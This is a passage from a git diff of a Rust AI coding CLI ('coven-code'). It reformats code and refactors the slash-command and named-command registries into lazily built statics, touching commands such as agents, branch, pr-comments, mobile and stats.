Lazy>> = Lazy::new(|| { vec![ Box::new(HelpCommand), Box::new(ClearCommand), @@ -9195,14 +10042,20 @@ pub fn all_commands() -> Vec> { // Durable long-running goals Box::new(GoalCommand), ] +}); + +/// Return all built-in slash commands. +pub fn all_commands() -> &'static [Box] { + &COMMANDS } /// Find a command by name or alias. -pub fn find_command(name: &str) -> Option> { +pub fn find_command(name: &str) -> Option<&'static dyn SlashCommand> { let name = name.trim_start_matches('/'); - all_commands().into_iter().find(|c| { - c.name() == name || c.aliases().contains(&name) - }) + all_commands() + .iter() + .find(|c| c.name() == name || c.aliases().contains(&name)) + .map(|c| c.as_ref()) } /// Build `HelpEntry` values for all non-hidden commands, suitable for @@ -9232,15 +10085,22 @@ struct TemplateCommand { #[async_trait] impl SlashCommand for TemplateCommand { - fn name(&self) -> &str { &self.name } + fn name(&self) -> &str { + &self.name + } fn description(&self) -> &str { - self.template.description.as_deref().unwrap_or("Custom command") + self.template + .description + .as_deref() + .unwrap_or("Custom command") } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let mut words = args.split_whitespace(); let arg1 = words.next().unwrap_or(""); let arg2 = words.next().unwrap_or(""); - let prompt = self.template.template + let prompt = self + .template + .template .replace("$ARGUMENTS", args) .replace("$1", arg1) .replace("$2", arg2); @@ -9251,12 +10111,16 @@ impl SlashCommand for TemplateCommand { /// Build slash commands from user-defined command templates stored in /// `settings.commands`. pub fn commands_from_settings(settings: &claurst_core::Settings) -> Vec> { - settings.commands.iter().map(|(name, template)| { - Box::new(TemplateCommand { - name: name.clone(), - template: template.clone(), - }) as Box - }).collect() + settings + .commands + .iter() + .map(|(name, template)| { + Box::new(TemplateCommand { + name: name.clone(), + template: template.clone(), + }) as Box + }) + .collect() } // --------------------------------------------------------------------------- @@ -9272,14 +10136,19 @@ struct SkillCommand { #[async_trait] impl SlashCommand for SkillCommand { - fn name(&self) -> &str { &self.name } - fn description(&self) -> &str { &self.description } + fn name(&self) -> &str { + &self.name + } + fn description(&self) -> &str { + &self.description + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { let mut words = args.split_whitespace(); let arg1 = words.next().unwrap_or(""); let arg2 = words.next().unwrap_or(""); - let prompt = self.template + let prompt = self + .template .replace("$ARGUMENTS", args) .replace("$1", arg1) .replace("$2", arg2); @@ -9300,10 +10169,8 @@ pub fn commands_from_discovered_skills( let discovered = claurst_core::discover_skills(cwd, skills_config); // Build a set of built-in command names so we can skip collisions. let all_cmds = all_commands(); - let builtin_names: std::collections::HashSet<&str> = all_cmds - .iter() - .map(|c| c.name()) - .collect(); + let builtin_names: std::collections::HashSet<&str> = + all_cmds.iter().map(|c| c.name()).collect(); discovered .into_values() @@ -9319,11 +10186,10 @@ pub fn commands_from_discovered_skills( } /// Execute a slash command string (with leading /). -pub async fn execute_command( - input: &str, - ctx: &mut CommandContext, -) -> Option { - if !claurst_tui::input::is_slash_command(input) { return None; } +pub async fn execute_command(input: &str, ctx: &mut CommandContext) -> Option { + if !claurst_tui::input::is_slash_command(input) { + return None; + } let (name, args) = claurst_tui::input::parse_slash_command(input); // First check built-in commands. @@ -9334,7 +10200,10 @@ pub async fn execute_command( // Check user-defined command templates from settings. let cmd_name = name.trim_start_matches('/'); if let Some(tmpl) = ctx.config.commands.get(cmd_name).cloned() { - let tc = TemplateCommand { name: cmd_name.to_string(), template: tmpl }; + let tc = TemplateCommand { + name: cmd_name.to_string(), + template: tmpl, + }; return Some(tc.execute(args, ctx).await); } @@ -9352,12 +10221,12 @@ pub async fn execute_command( } // Then check plugin-defined slash commands. - let project_dir = ctx.working_dir.clone(); - let registry = claurst_plugins::load_plugins(&project_dir, &[]).await; - for cmd_def in registry.all_command_defs() { - if cmd_def.name == cmd_name { - let adapter = PluginSlashCommandAdapter { def: cmd_def }; - return Some(adapter.execute(args, ctx).await); + if let Some(registry) = claurst_plugins::global_plugin_registry() { + for cmd_def in registry.all_command_defs() { + if cmd_def.name == cmd_name { + let adapter = PluginSlashCommandAdapter { def: cmd_def }; + return Some(adapter.execute(args, ctx).await); + } } } @@ -9458,13 +10327,41 @@ mod tests { #[test] fn test_core_commands_present() { let expected = [ - "help", "clear", "compact", "cost", "exit", "model", - "config", "version", "status", "diff", "memory", "hooks", - "permissions", "plan", "tasks", "session", "login", "logout", "refresh", - "feedback", "usage", "plugin", "reload-plugins", - "add-dir", "agents", "branch", "tag", - "passes", "ide", "pr-comments", "desktop", "mobile", - "install-github-app", "web-setup", "stickers", + "help", + "clear", + "compact", + "cost", + "exit", + "model", + "config", + "version", + "status", + "diff", + "memory", + "hooks", + "permissions", + "plan", + "tasks", + "session", + "login", + "logout", + "refresh", + "feedback", + "usage", + "plugin", + "reload-plugins", + "add-dir", + "agents", + "branch", + "tag", + "passes", + "ide", + "pr-comments", + "desktop", + "mobile", + "install-github-app", + "web-setup", + "stickers", ]; for name in &expected { assert!( @@ -9569,9 +10466,7 @@ mod tests { let result = cmd.execute("--codex --label work", &mut ctx).await; match result { CommandResult::StartLoginForProvider { - provider, - label, - .. + provider, label, .. } => { assert_eq!(provider, claurst_core::accounts::PROVIDER_CODEX); assert_eq!(label.as_deref(), Some("work")); diff --git a/src-rust/crates/commands/src/named_commands.rs b/src-rust/crates/commands/src/named_commands.rs index e026ef7..e644db8 100644 --- a/src-rust/crates/commands/src/named_commands.rs +++ b/src-rust/crates/commands/src/named_commands.rs @@ -17,6 +17,7 @@ //! src/commands/remote-setup/index.ts (implied by component structure) use crate::{CommandContext, CommandResult}; +use once_cell::sync::Lazy; // `open` crate: used by StickersCommand to launch the browser. // --------------------------------------------------------------------------- @@ -46,9 +47,15 @@ pub trait NamedCommand: Send + Sync { pub struct AgentsCommand; impl NamedCommand for AgentsCommand { - fn name(&self) -> &str { "agents" } - fn description(&self) -> &str { "Manage and configure sub-agents and Coven familiars" } - fn usage(&self) -> &str { "coven-code agents [list|create|edit|delete|familiars] [name]" } + fn name(&self) -> &str { + "agents" + } + fn description(&self) -> &str { + "Manage and configure sub-agents and Coven familiars" + } + fn usage(&self) -> &str { + "coven-code agents [list|create|edit|delete|familiars] [name]" + } fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult { match args.first().copied().unwrap_or("list") { @@ -91,7 +98,10 @@ impl NamedCommand for AgentsCommand { } if !familiar_defs.is_empty() { - out.push_str(&format!("\n\u{2728} Coven Familiars ({})\n", familiar_defs.len())); + out.push_str(&format!( + "\n\u{2728} Coven Familiars ({})\n", + familiar_defs.len() + )); for def in &familiar_defs { let id = def.source.trim_start_matches("coven:familiar:"); let desc_short = def @@ -109,7 +119,9 @@ impl NamedCommand for AgentsCommand { } if user_defs.is_empty() { - out.push_str("\nUse 'coven-code agents create ' to add a workspace agent."); + out.push_str( + "\nUse 'coven-code agents create ' to add a workspace agent.", + ); } CommandResult::Message(out) } @@ -131,7 +143,10 @@ impl NamedCommand for AgentsCommand { let mut out = format!("\u{2728} Coven Familiars ({})\n\n", familiar_defs.len()); for def in &familiar_defs { let id = def.source.trim_start_matches("coven:familiar:"); - out.push_str(&format!(" \u{2605} {} [{}]\n {}\n\n", def.name, id, def.description)); + out.push_str(&format!( + " \u{2605} {} [{}]\n {}\n\n", + def.name, id, def.description + )); } out.push_str("Switch to a familiar: coven-code agent "); CommandResult::Message(out) @@ -152,9 +167,11 @@ impl NamedCommand for AgentsCommand { "edit" => { let name = match args.get(1).copied() { Some(n) => n, - None => return CommandResult::Error( - "Usage: coven-code agents edit ".to_string(), - ), + None => { + return CommandResult::Error( + "Usage: coven-code agents edit ".to_string(), + ) + } }; CommandResult::Message(format!( "Edit .coven-code/agents/{name}.md in your editor to update the agent." @@ -163,16 +180,20 @@ impl NamedCommand for AgentsCommand { "delete" => { let name = match args.get(1).copied() { Some(n) => n, - None => return CommandResult::Error( - "Usage: coven-code agents delete ".to_string(), - ), + None => { + return CommandResult::Error( + "Usage: coven-code agents delete ".to_string(), + ) + } }; CommandResult::Message(format!( "Delete .coven-code/agents/{name}.md to remove the agent." )) } - sub => CommandResult::Error(format!("Unknown agents subcommand: '{sub}'\ - \nValid: list, familiars, create, edit, delete")), + sub => CommandResult::Error(format!( + "Unknown agents subcommand: '{sub}'\ + \nValid: list, familiars, create, edit, delete" + )), } } } @@ -184,9 +205,15 @@ impl NamedCommand for AgentsCommand { pub struct AgentCommand; impl NamedCommand for AgentCommand { - fn name(&self) -> &str { "agent" } - fn description(&self) -> &str { "Show or switch the active Coven familiar / agent persona" } - fn usage(&self) -> &str { "coven-code agent [name|--list]" } + fn name(&self) -> &str { + "agent" + } + fn description(&self) -> &str { + "Show or switch the active Coven familiar / agent persona" + } + fn usage(&self) -> &str { + "coven-code agent [name|--list]" + } fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult { let defs = claurst_tui::agents_view::load_agent_definitions(&ctx.working_dir); @@ -277,9 +304,15 @@ impl NamedCommand for AgentCommand { pub struct AddDirCommand; impl NamedCommand for AddDirCommand { - fn name(&self) -> &str { "add-dir" } - fn description(&self) -> &str { "Add a directory to Coven Code's allowed workspace paths" } - fn usage(&self) -> &str { "coven-code add-dir " } + fn name(&self) -> &str { + "add-dir" + } + fn description(&self) -> &str { + "Add a directory to Coven Code's allowed workspace paths" + } + fn usage(&self) -> &str { + "coven-code add-dir " + } fn execute_named(&self, args: &[&str], _ctx: &CommandContext) -> CommandResult { let raw = match args.first() { @@ -311,7 +344,12 @@ impl NamedCommand for AddDirCommand { } }; - if !settings.config.workspace_paths.iter().any(|p| p == &abs_path) { + if !settings + .config + .workspace_paths + .iter() + .any(|p| p == &abs_path) + { settings.config.workspace_paths.push(abs_path.clone()); if let Err(e) = settings.save_sync() { return CommandResult::Error(format!( @@ -336,9 +374,15 @@ impl NamedCommand for AddDirCommand { pub struct BranchCommand; impl NamedCommand for BranchCommand { - fn name(&self) -> &str { "branch" } - fn description(&self) -> &str { "Create a branch of the current conversation at this point" } - fn usage(&self) -> &str { "coven-code branch [create|list|switch] [name|id]" } + fn name(&self) -> &str { + "branch" + } + fn description(&self) -> &str { + "Create a branch of the current conversation at this point" + } + fn usage(&self) -> &str { + "coven-code branch [create|list|switch] [name|id]" + } fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult { match args.first().copied().unwrap_or("") { @@ -455,9 +499,15 @@ impl NamedCommand for BranchCommand { pub struct TagCommand; impl NamedCommand for TagCommand { - fn name(&self) -> &str { "tag" } - fn description(&self) -> &str { "Toggle a searchable tag on the current session" } - fn usage(&self) -> &str { "coven-code tag [list|add|remove|toggle] [tag]" } + fn name(&self) -> &str { + "tag" + } + fn description(&self) -> &str { + "Toggle a searchable tag on the current session" + } + fn usage(&self) -> &str { + "coven-code tag [list|add|remove|toggle] [tag]" + } fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult { let session_id = ctx.session_id.clone(); @@ -593,9 +643,15 @@ impl NamedCommand for TagCommand { pub struct PassesCommand; impl NamedCommand for PassesCommand { - fn name(&self) -> &str { "passes" } - fn description(&self) -> &str { "Share a free week of Coven Code with friends" } - fn usage(&self) -> &str { "coven-code passes" } + fn name(&self) -> &str { + "passes" + } + fn description(&self) -> &str { + "Share a free week of Coven Code with friends" + } + fn usage(&self) -> &str { + "coven-code passes" + } fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult { CommandResult::Message( @@ -638,9 +694,15 @@ fn is_pid_alive(pid: u64) -> bool { pub struct IdeCommand; impl NamedCommand for IdeCommand { - fn name(&self) -> &str { "ide" } - fn description(&self) -> &str { "Manage IDE integrations and show status" } - fn usage(&self) -> &str { "coven-code ide [status|connect|disconnect|open]" } + fn name(&self) -> &str { + "ide" + } + fn description(&self) -> &str { + "Manage IDE integrations and show status" + } + fn usage(&self) -> &str { + "coven-code ide [status|connect|disconnect|open]" + } fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult { // ---- Environment-based IDE detection -------------------------------- @@ -665,22 +727,30 @@ impl NamedCommand for IdeCommand { if let Ok(entries) = std::fs::read_dir(&lockfile_dir) { for entry in entries.flatten() { let path = entry.path(); - if path.extension().map_or(false, |e| e == "lock") { + if path.extension().is_some_and(|e| e == "lock") { if let Ok(lock_content) = std::fs::read_to_string(&path) { if let Ok(info) = serde_json::from_str::(&lock_content) { let pid = info["pid"].as_u64().unwrap_or(0); let alive = is_pid_alive(pid); if alive { - let ide_name = info["ideName"].as_str().unwrap_or("Unknown IDE").to_string(); + let ide_name = info["ideName"] + .as_str() + .unwrap_or("Unknown IDE") + .to_string(); let port = info["port"].as_u64().unwrap_or(0); let workspace_folders = info["workspaceFolders"] .as_array() - .map(|a| a.iter() - .filter_map(|v| v.as_str()) - .collect::>() - .join(", ")) + .map(|a| { + a.iter() + .filter_map(|v| v.as_str()) + .collect::>() + .join(", ") + }) .unwrap_or_default(); - ides.push(format!(" {} (PID {}, port {}) \u{2014} {}", ide_name, pid, port, workspace_folders)); + ides.push(format!( + " {} (PID {}, port {}) \u{2014} {}", + ide_name, pid, port, workspace_folders + )); } else { // Clean up dead lockfile let _ = std::fs::remove_file(&path); @@ -708,9 +778,15 @@ impl NamedCommand for IdeCommand { pub struct PrCommentsCommand; impl NamedCommand for PrCommentsCommand { - fn name(&self) -> &str { "pr-comments" } - fn description(&self) -> &str { "Get review comments from the current GitHub pull request" } - fn usage(&self) -> &str { "coven-code pr-comments" } + fn name(&self) -> &str { + "pr-comments" + } + fn description(&self) -> &str { + "Get review comments from the current GitHub pull request" + } + fn usage(&self) -> &str { + "coven-code pr-comments" + } fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult { // Step 1: Get current git remote + PR info via gh CLI @@ -719,19 +795,19 @@ impl NamedCommand for PrCommentsCommand { .output(); let pr_info = match pr_json { - Err(_) => return CommandResult::Error( - "GitHub CLI (gh) not found. Install from https://cli.github.com".to_string() - ), + Err(_) => { + return CommandResult::Error( + "GitHub CLI (gh) not found. Install from https://cli.github.com".to_string(), + ) + } Ok(out) if !out.status.success() => { let stderr = String::from_utf8_lossy(&out.stderr); return CommandResult::Error(format!("No open PR found: {}", stderr.trim())); } - Ok(out) => { - match serde_json::from_slice::(&out.stdout) { - Ok(v) => v, - Err(_) => return CommandResult::Error("Failed to parse gh output".to_string()), - } - } + Ok(out) => match serde_json::from_slice::(&out.stdout) { + Ok(v) => v, + Err(_) => return CommandResult::Error("Failed to parse gh output".to_string()), + }, }; let pr_number = pr_info["number"].as_u64().unwrap_or(0); @@ -743,7 +819,10 @@ impl NamedCommand for PrCommentsCommand { // Step 2: Fetch review comments via gh API let comments_out = std::process::Command::new("gh") - .args(["api", &format!("repos/{{owner}}/{{repo}}/pulls/{}/comments", pr_number)]) + .args([ + "api", + &format!("repos/{{owner}}/{{repo}}/pulls/{}/comments", pr_number), + ]) .output(); let mut output = format!("PR #{} \u{2014} {}\n\n", pr_number, pr_url); @@ -759,7 +838,10 @@ impl NamedCommand for PrCommentsCommand { let user = c["user"]["login"].as_str().unwrap_or("unknown"); let body = c["body"].as_str().unwrap_or("").trim(); let body_short: String = body.chars().take(200).collect(); - output.push_str(&format!(" {}:{} by @{}:\n {}\n\n", path, line, user, body_short)); + output.push_str(&format!( + " {}:{} by @{}:\n {}\n\n", + path, line, user, body_short + )); } } Ok(_) => output.push_str("No review comments found.\n"), @@ -780,9 +862,15 @@ impl NamedCommand for PrCommentsCommand { pub struct DesktopCommand; impl NamedCommand for DesktopCommand { - fn name(&self) -> &str { "desktop" } - fn description(&self) -> &str { "Download and set up Coven Code Desktop app" } - fn usage(&self) -> &str { "coven-code desktop" } + fn name(&self) -> &str { + "desktop" + } + fn description(&self) -> &str { + "Download and set up Coven Code Desktop app" + } + fn usage(&self) -> &str { + "coven-code desktop" + } fn execute_named(&self, _args: &[&str], ctx: &CommandContext) -> CommandResult { let os = std::env::consts::OS; @@ -801,7 +889,11 @@ impl NamedCommand for DesktopCommand { } "windows" => { std::env::var("LOCALAPPDATA") - .map(|p| std::path::Path::new(&p).join("Programs/Claude/Claude.exe").exists()) + .map(|p| { + std::path::Path::new(&p) + .join("Programs/Claude/Claude.exe") + .exists() + }) .unwrap_or(false) || std::path::Path::new("C:\\Program Files\\Claude\\Claude.exe").exists() } @@ -811,7 +903,7 @@ impl NamedCommand for DesktopCommand { // If a remote session is active the user is already bridged — show a // deep link so they can open the current session in Desktop. if let Some(ref session_url) = ctx.remote_session_url { - let session_id = session_url.split('/').last().unwrap_or(""); + let session_id = session_url.split('/').next_back().unwrap_or(""); let deep_link = format!("claude://session/{}", session_id); let mut msg = String::new(); @@ -918,12 +1010,12 @@ pub fn render_qr(url: &str) -> Vec { while r < (width + qz) as isize { let mut line = String::new(); for c in -(qz as isize)..(width + qz) as isize { - let top = dark(r, c); - let bot = dark(r + 1, c); + let top = dark(r, c); + let bot = dark(r + 1, c); line.push(match (top, bot) { - (true, true) => '█', - (true, false) => '▀', - (false, true) => '▄', + (true, true) => '█', + (true, false) => '▀', + (false, true) => '▄', (false, false) => ' ', }); } @@ -942,14 +1034,20 @@ pub fn render_qr(url: &str) -> Vec { pub struct MobileCommand; impl NamedCommand for MobileCommand { - fn name(&self) -> &str { "mobile" } - fn description(&self) -> &str { "Download the Coven Code mobile app" } - fn usage(&self) -> &str { "coven-code mobile [ios|android]" } + fn name(&self) -> &str { + "mobile" + } + fn description(&self) -> &str { + "Download the Coven Code mobile app" + } + fn usage(&self) -> &str { + "coven-code mobile [ios|android]" + } fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult { - let ios_url = "https://apps.apple.com/app/claude-by-anthropic/id6473753684"; + let ios_url = "https://apps.apple.com/app/claude-by-anthropic/id6473753684"; let android_url = "https://play.google.com/store/apps/details?id=com.anthropic.claude"; - let mobile_url = "https://claude.ai/mobile"; + let mobile_url = "https://claude.ai/mobile"; let has_session = ctx.remote_session_url.is_some(); @@ -963,16 +1061,19 @@ impl NamedCommand for MobileCommand { // Choose which platform / URL to show the QR for (default: claude.ai/mobile). let (platform_label, qr_url): (&str, &str) = match args.first().copied().unwrap_or("") { - "ios" | "1" => ("[1] iOS (selected)", ios_url), - "android" | "2" => ("[2] Android (selected)", android_url), - "session" | "3" => { + "ios" | "1" => ("[1] iOS (selected)", ios_url), + "android" | "2" => ("[2] Android (selected)", android_url), + "session" | "3" => { if has_session { ("[3] Session (selected)", session_qr_url.as_str()) } else { - ("session link unavailable \u{2014} no active remote session", mobile_url) + ( + "session link unavailable \u{2014} no active remote session", + mobile_url, + ) } } - _ => ("both platforms", mobile_url), + _ => ("both platforms", mobile_url), }; let qr_lines = render_qr(qr_url); @@ -981,7 +1082,9 @@ impl NamedCommand for MobileCommand { out.push_str("Scan to download Coven Code mobile app\n"); out.push_str(&format!("Platform: {platform_label}\n\n")); if has_session { - out.push_str(" [1] iOS [2] Android [3] Session (QR links to active session)\n\n"); + out.push_str( + " [1] iOS [2] Android [3] Session (QR links to active session)\n\n", + ); } else { out.push_str(" [1] iOS [2] Android\n\n"); } @@ -1013,9 +1116,15 @@ impl NamedCommand for MobileCommand { pub struct InstallGithubAppCommand; impl NamedCommand for InstallGithubAppCommand { - fn name(&self) -> &str { "install-github-app" } - fn description(&self) -> &str { "Set up Coven Code GitHub Actions for a repository" } - fn usage(&self) -> &str { "coven-code install-github-app" } + fn name(&self) -> &str { + "install-github-app" + } + fn description(&self) -> &str { + "Set up Coven Code GitHub Actions for a repository" + } + fn usage(&self) -> &str { + "coven-code install-github-app" + } fn execute_named(&self, _args: &[&str], ctx: &CommandContext) -> CommandResult { let provider_id = ctx.config.selected_provider_id(); @@ -1031,15 +1140,13 @@ impl NamedCommand for InstallGithubAppCommand { ) }); - CommandResult::Message( - format!( - "To install the Coven Code GitHub App:\n\ + CommandResult::Message(format!( + "To install the Coven Code GitHub App:\n\ 1. Visit https://github.com/apps/claude-code-app and click Install\n\ 2. Select the repositories to enable\n\ {provider_secret_step}\n\n\ The app enables Coven Code in GitHub Actions workflows for the configured provider." - ), - ) + )) } } @@ -1050,9 +1157,15 @@ impl NamedCommand for InstallGithubAppCommand { pub struct RemoteSetupCommand; impl NamedCommand for RemoteSetupCommand { - fn name(&self) -> &str { "remote-setup" } - fn description(&self) -> &str { "Check and configure a remote Coven Code environment" } - fn usage(&self) -> &str { "coven-code remote-setup" } + fn name(&self) -> &str { + "remote-setup" + } + fn description(&self) -> &str { + "Check and configure a remote Coven Code environment" + } + fn usage(&self) -> &str { + "coven-code remote-setup" + } fn execute_named(&self, _args: &[&str], ctx: &CommandContext) -> CommandResult { use std::net::ToSocketAddrs; @@ -1068,7 +1181,10 @@ impl NamedCommand for RemoteSetupCommand { let credential_help = if credential_hint.is_empty() { format!("configure an API key for {provider_name} in settings") } else { - format!("set {} or configure apiKey in settings", credential_hint.join(" / ")) + format!( + "set {} or configure apiKey in settings", + credential_hint.join(" / ") + ) }; // Step 1: Check provider credentials @@ -1090,7 +1206,11 @@ impl NamedCommand for RemoteSetupCommand { let has_ssh_agent = std::env::var("SSH_AUTH_SOCK").is_ok(); steps.push(format!( "{} SSH agent forwarding {}", - if has_ssh_agent { "\u{2713}" } else { "\u{25cb}" }, + if has_ssh_agent { + "\u{2713}" + } else { + "\u{25cb}" + }, if has_ssh_agent { "detected".to_string() } else { @@ -1161,17 +1281,23 @@ impl NamedCommand for RemoteSetupCommand { pub struct StickersCommand; impl NamedCommand for StickersCommand { - fn name(&self) -> &str { "stickers" } - fn description(&self) -> &str { "Open the Coven Code sticker page in your browser" } - fn usage(&self) -> &str { "coven-code stickers" } + fn name(&self) -> &str { + "stickers" + } + fn description(&self) -> &str { + "Open the Coven Code sticker page in your browser" + } + fn usage(&self) -> &str { + "coven-code stickers" + } fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult { let url = "https://www.stickermule.com/claudecode"; match open::that(url) { Ok(_) => CommandResult::Message(format!("Opening stickers page: {url}")), - Err(e) => CommandResult::Message(format!( - "Visit: {url}\n(Could not open browser: {e})" - )), + Err(e) => { + CommandResult::Message(format!("Visit: {url}\n(Could not open browser: {e})")) + } } } } @@ -1183,13 +1309,20 @@ impl NamedCommand for StickersCommand { pub struct UltraplanCommand; impl NamedCommand for UltraplanCommand { - fn name(&self) -> &str { "ultraplan" } - fn description(&self) -> &str { "Launch Ultraplan agentic code planner with extended thinking" } - fn usage(&self) -> &str { "coven-code ultraplan [--effort=medium|high|maximum]" } + fn name(&self) -> &str { + "ultraplan" + } + fn description(&self) -> &str { + "Launch Ultraplan agentic code planner with extended thinking" + } + fn usage(&self) -> &str { + "coven-code ultraplan [--effort=medium|high|maximum]" + } fn execute_named(&self, args: &[&str], _ctx: &CommandContext) -> CommandResult { // Parse effort level from args - let effort = args.iter() + let effort = args + .iter() .find(|arg| arg.starts_with("--effort=")) .and_then(|arg| arg.strip_prefix("--effort=")) .unwrap_or("medium"); @@ -1225,7 +1358,9 @@ impl NamedCommand for UltraplanCommand { // --------------------------------------------------------------------------- impl NamedCommand for crate::StatsCommand { - fn name(&self) -> &str { "stats" } + fn name(&self) -> &str { + "stats" + } fn description(&self) -> &str { "Aggregate token / cost / tool stats across saved sessions" } @@ -1243,8 +1378,7 @@ impl NamedCommand for crate::StatsCommand { // Registry // --------------------------------------------------------------------------- -/// Return one instance of every registered named command. -pub fn all_named_commands() -> Vec> { +static NAMED_COMMANDS: Lazy>> = Lazy::new(|| { vec![ Box::new(AgentsCommand), Box::new(AgentCommand), @@ -1262,14 +1396,20 @@ pub fn all_named_commands() -> Vec> { Box::new(UltraplanCommand), Box::new(crate::StatsCommand), ] +}); + +/// Return one instance of every registered named command. +pub fn all_named_commands() -> &'static [Box] { + &NAMED_COMMANDS } /// Look up a named command by its primary name (case-insensitive). -pub fn find_named_command(name: &str) -> Option> { +pub fn find_named_command(name: &str) -> Option<&'static dyn NamedCommand> { let needle = name.to_lowercase(); all_named_commands() - .into_iter() + .iter() .find(|c| c.name() == needle.as_str()) + .map(|c| c.as_ref()) } // --------------------------------------------------------------------------- @@ -1375,7 +1515,6 @@ mod tests { #[test] fn test_branch_create_no_session_returns_error() { - let ctx = make_ctx(); // session_id = "named-test-session" — no saved session let cmd = BranchCommand; // Calling create on a session that isn't "pre-session" but also doesn't exist // on disk: we can't call block_in_place outside a tokio runtime in a sync test, diff --git a/src-rust/crates/commands/src/stats.rs b/src-rust/crates/commands/src/stats.rs index d254742..a8a5475 100644 --- a/src-rust/crates/commands/src/stats.rs +++ b/src-rust/crates/commands/src/stats.rs @@ -67,21 +67,23 @@ fn parse_args(raw: &[&str]) -> Result { let arg = raw[i]; match arg { "--days" | "-n" => { - let v = raw.get(i + 1).ok_or_else(|| { - format!("{arg} requires a number, e.g. `--days 7`") - })?; - days = Some(v.parse::().map_err(|_| { - format!("Invalid value for {arg}: {v}") - })?); + let v = raw + .get(i + 1) + .ok_or_else(|| format!("{arg} requires a number, e.g. `--days 7`"))?; + days = Some( + v.parse::() + .map_err(|_| format!("Invalid value for {arg}: {v}"))?, + ); i += 2; } "--top" | "-t" => { - let v = raw.get(i + 1).ok_or_else(|| { - format!("{arg} requires a number, e.g. `--top 10`") - })?; - top = Some(v.parse::().map_err(|_| { - format!("Invalid value for {arg}: {v}") - })?); + let v = raw + .get(i + 1) + .ok_or_else(|| format!("{arg} requires a number, e.g. `--top 10`"))?; + top = Some( + v.parse::() + .map_err(|_| format!("Invalid value for {arg}: {v}"))?, + ); i += 2; } "--all-projects" | "-a" => { @@ -114,9 +116,7 @@ fn parse_args(raw: &[&str]) -> Result { "session" => { session_id = positional.get(1).map(|s| s.to_string()); if session_id.is_none() { - return Err( - "Usage: coven-code stats session ".to_string(), - ); + return Err("Usage: coven-code stats session ".to_string()); } Subcommand::SessionDetail } @@ -193,10 +193,7 @@ struct SessionStats { impl SessionStats { fn total_tokens(&self) -> u64 { - self.input_tokens - + self.output_tokens - + self.cache_creation_tokens - + self.cache_read_tokens + self.input_tokens + self.output_tokens + self.cache_creation_tokens + self.cache_read_tokens } fn duration_secs(&self) -> Option { @@ -296,8 +293,7 @@ fn parse_jsonl_sync(path: &Path) -> Vec { }; // First pass: collect tombstoned uuids. - let mut tombstoned: std::collections::HashSet = - std::collections::HashSet::new(); + let mut tombstoned: std::collections::HashSet = std::collections::HashSet::new(); for line in raw.lines() { let trimmed = line.trim(); if trimmed.is_empty() { @@ -308,8 +304,7 @@ fn parse_jsonl_sync(path: &Path) -> Vec { { continue; } - if let Ok(TranscriptEntry::Tombstone(t)) = - serde_json::from_str::(trimmed) + if let Ok(TranscriptEntry::Tombstone(t)) = serde_json::from_str::(trimmed) { tombstoned.insert(t.deleted_uuid); } @@ -676,7 +671,10 @@ fn render_scope_line(agg: &Aggregated, ctx: &CommandContext) -> String { Some(d) => format!("last {d} day{}", if d == 1 { "" } else { "s" }), None => "all time".to_string(), }; - format!("Scope: {scope} · {window} · {} sessions", agg.sessions.len()) + format!( + "Scope: {scope} · {window} · {} sessions", + agg.sessions.len() + ) } fn render_summary(agg: &Aggregated, ctx: &CommandContext) -> String { @@ -851,9 +849,7 @@ fn render_sessions(agg: &Aggregated, top: Option, ctx: &CommandContext) - )); } } - out.push_str( - "\nUse `coven-code stats session ` to drill into a session.\n", - ); + out.push_str("\nUse `coven-code stats session ` to drill into a session.\n"); out } @@ -916,10 +912,7 @@ fn render_tools(agg: &Aggregated, top: Option, ctx: &CommandContext) -> S if let Some(n) = top { if tools.len() > n { - out.push_str(&format!( - "\n … {} more tool(s) hidden.\n", - tools.len() - n - )); + out.push_str(&format!("\n … {} more tool(s) hidden.\n", tools.len() - n)); } } out @@ -951,7 +944,8 @@ fn render_daily(agg: &Aggregated, ctx: &CommandContext) -> String { let date = if let Some(ts) = s.last_ts { ts.date_naive() } else if let Some(m) = s.mtime { - let secs = m.duration_since(SystemTime::UNIX_EPOCH) + let secs = m + .duration_since(SystemTime::UNIX_EPOCH) .map(|d| d.as_secs() as i64) .unwrap_or(0); DateTime::::from_timestamp(secs, 0) @@ -1044,11 +1038,7 @@ fn render_daily(agg: &Aggregated, ctx: &CommandContext) -> String { out } -fn render_session_detail( - agg: &Aggregated, - session_id: &str, - ctx: &CommandContext, -) -> String { +fn render_session_detail(agg: &Aggregated, session_id: &str, ctx: &CommandContext) -> String { let s = match agg.sessions.iter().find(|s| s.session_id == session_id) { Some(s) => s, None => { @@ -1070,10 +1060,7 @@ fn render_session_detail( out.push_str(&format!(" Title: {}\n", truncate(t, 60))); } if let Some(lp) = &s.last_prompt { - out.push_str(&format!( - " Last prompt: {}\n", - truncate(lp.trim(), 60) - )); + out.push_str(&format!(" Last prompt: {}\n", truncate(lp.trim(), 60))); } if let Some(first) = s.first_ts { out.push_str(&format!( @@ -1096,10 +1083,7 @@ fn render_session_detail( out.push_str("\nConversation\n────────────\n"); out.push_str(&format!(" User turns: {:>8}\n", s.user_turns)); - out.push_str(&format!( - " Assistant turns: {:>8}\n", - s.assistant_turns - )); + out.push_str(&format!(" Assistant turns: {:>8}\n", s.assistant_turns)); out.push_str(&format!(" Tool calls: {:>8}\n", s.tool_calls)); out.push_str("\nTokens\n──────\n"); @@ -1216,8 +1200,7 @@ pub fn run(raw: &[&str], ctx: &CommandContext) -> CommandResult { mod tests { use super::*; use claurst_core::session_storage::{ - write_transcript_entry, AiTitleEntry, CustomTitleEntry, LastPromptEntry, - TranscriptMessage, + write_transcript_entry, AiTitleEntry, CustomTitleEntry, LastPromptEntry, TranscriptMessage, }; use claurst_core::types::{Message, MessageContent, MessageCost, Role}; use tempfile::TempDir; @@ -1318,13 +1301,8 @@ mod tests { .to_string(); let mtime = fs::metadata(&path).and_then(|m| m.modified()).ok(); let entries = parse_jsonl_sync(&path); - let mut stats = 